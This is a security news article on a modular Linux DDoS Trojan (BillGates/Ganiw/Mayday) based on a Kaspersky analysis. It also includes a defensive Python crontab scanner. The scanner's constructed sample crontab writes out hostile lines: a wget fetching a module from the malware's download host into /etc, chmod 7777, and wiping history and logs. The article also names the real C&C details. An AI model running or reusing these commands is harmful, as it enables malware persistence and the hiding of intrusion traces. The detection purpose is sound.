More details are emerging regarding the Linux DDoS (distributed denial of service) Trojan, researchers said.
“The capability that we found the most interesting was the Trojan’s ability to conduct DNS Amplification-type attacks,” said Mikhail Kuzin, a malware analyst at Kaspersky Lab, who said the researchers came across an article published in February on a Russian IT website entitled ‘Studying the BillGates Linux Botnet.’ “In addition, it followed from the article that the Trojan had a sophisticated modular structure, something we had not seen in the world of Linux malware before.”
The article provided a link to download all of the Trojan’s files. The archive contained files that were all modules of the same Trojan: atddd; cupsdd; cupsddh; ksapdd; kysapdd; skysapdd; and xfsdxd. The files cupsdd and cupsddh ended up detected by Kaspersky Lab as Backdoor.Linux.Ganiw.a, while atddd and the remaining files are Backdoor.Linux.Mayday.f. The archive with the files also contained a configuration file for cron — the Linux task scheduler. In this case, the utility is able to get a foothold on the system, Kuzin said in a blog post.
The Trojan uses cron to perform a set of scheduled tasks. Once a minute it terminates the processes of all applications that can interfere with its operation: .IptabLes, nfsd4, profild.key, nfsd, DDosl, lengchao32, b26, codelove and node24. In addition, once every 90 minutes it terminates all of its own processes, and every two hours it deletes its components from the /etc folder and downloads them again from http://www.dgnfd564sdf.com:8080/[module_name] (module_name = name of the Trojan’s module, e.g., cupsdd). It also re-launches all of its modules every 90 minutes, purges system logs and bash command history, and executes chmod 7777 [module_name] every minute.
“During subsequent analysis of the files, we did not find any code responsible for saving the config file for cron,” Kuzin said. “Most likely, the file was manually downloaded to the victim machine by a cybercriminal after gaining remote access to the system.”
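As an added illustration (not code from the original article or from Kaspersky's research), the following Python script scans a crontab for entries matching the scheduled behaviour described above: downloads into /etc, chmod 7777 on a module, and purging of logs or shell history. The crontab it scans is constructed for this example, and the regexes are illustrative heuristics, not vendor signatures.

```python
import re

# Module file names the article lists for this Trojan.
MODULE_NAMES = sorted(["atddd", "cupsdd", "cupsddh", "ksapdd", "kysapdd", "skysapdd", "xfsdxd"])

# Heuristic rules (label, regex) for the scheduled behaviour described in the article.
# Assumption: these patterns are illustrative, not signatures from any vendor.
RULES = [
    ("download-to-etc", re.compile(r"\b(wget|curl)\b.*https?://\S+.*\s/etc/")),
    ("chmod-7777", re.compile(r"\bchmod\s+7777\b")),
    ("purge-history-or-logs", re.compile(r"(history\s+-c|rm\s+-f?\s*\S*\.bash_history|>\s*/var/log/\S+)")),
    ("module-in-etc", re.compile(r"/etc/(" + "|".join(MODULE_NAMES) + r")\b")),
]

def parse_crontab(text):
    """Yield (schedule, command) pairs; skips comments, blank lines and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                 # @hourly, @reboot, ...
            schedule, _, command = line.partition(" ")
        else:                                    # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command.strip()

def scan_crontab(text):
    """Return findings; each carries the schedule, the command and the rule labels it hit."""
    findings = []
    for schedule, command in parse_crontab(text):
        hits = [label for label, rx in RULES if rx.search(command)]
        if hits:
            findings.append({"schedule": schedule, "command": command, "rules": hits})
    return findings

# Constructed sample crontab modelled on the behaviour the article describes (not a real capture).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# every minute: reset permissions on a module
* * * * * chmod 7777 /etc/cupsdd
# every two hours: delete and re-download a module into /etc
0 */2 * * * rm -f /etc/cupsdd; wget -q http://www.dgnfd564sdf.com:8080/cupsdd -O /etc/cupsdd
# every minute: purge shell history and a login log
* * * * * history -c; > /var/log/wtmp
# benign entry that should not be flagged
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f['rules'])}] {f['schedule']} -> {f['command']}")
```

Run it against `/etc/crontab`, `/etc/cron.d/*` and each user's crontab (`crontab -l -u USER`) to triage a host; a hit on the module-name rule alone is weak evidence, while a download into /etc combined with a permission reset every minute is not.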
The file atddd is a backdoor designed to conduct various types of DDoS attacks against the servers specified. The backdoor begins by calling the function daemon(1, 0), continuing to run in the background and redirecting standard input, output and errors to /dev/null, Kuzin said. Next it collects information about the system, and then decrypts strings defining the command and control server’s IP address and port number.
Eventually, the C&C passes along commands to attack using UDP floods, TCP floods, ICMP floods and DNS flood attacks.
Cupsdd (Backdoor.Linux.Ganiw.a) can also carry out various types of DDoS attacks, but is more feature-rich and sophisticated, Kuzin said. Cupsddh, also detected as Backdoor.Linux.Ganiw.a, includes an attack type that allows for DNS amplification.
“The last attack type on the list above is different in that packets are sent to vulnerable DNS servers, with the attack target specified as the sender’s IP address,” Kuzin said. “As a result, the cybercriminal sends a small packet with a DNS request and the DNS server responds to the attack target with a significantly larger packet. The list of vulnerable DNS servers is stored in the file libamplify.so, which is written to disk following the relevant command from the C&C.”
In addition, an updated version of the Trojan has appeared with new functions. The most significant changes were made to the Gates module, cupsdd. It now has three modes. The first is the installation and update mode. The second is the monitoring mode, in which it writes the PID of the current process to the file /tmp/moni.lock and starts threads that monitor the Bill module and the Gates module running in the mode that controls the Bill module. The third mode is for controlling the Bill module and operates in exactly the same way as in the previous version of the Trojan.
“To summarize, in the new version of the Trojan its authors have added a little ‘robustness’ without making any significant functionality changes,” Kuzin blogged. “It is also worth noting that the hard-coded IP address of the C&C server has remained the same (22.214.171.124) in this version, but the port number has changed — it is now 36008 instead of 30000 in the previous version.”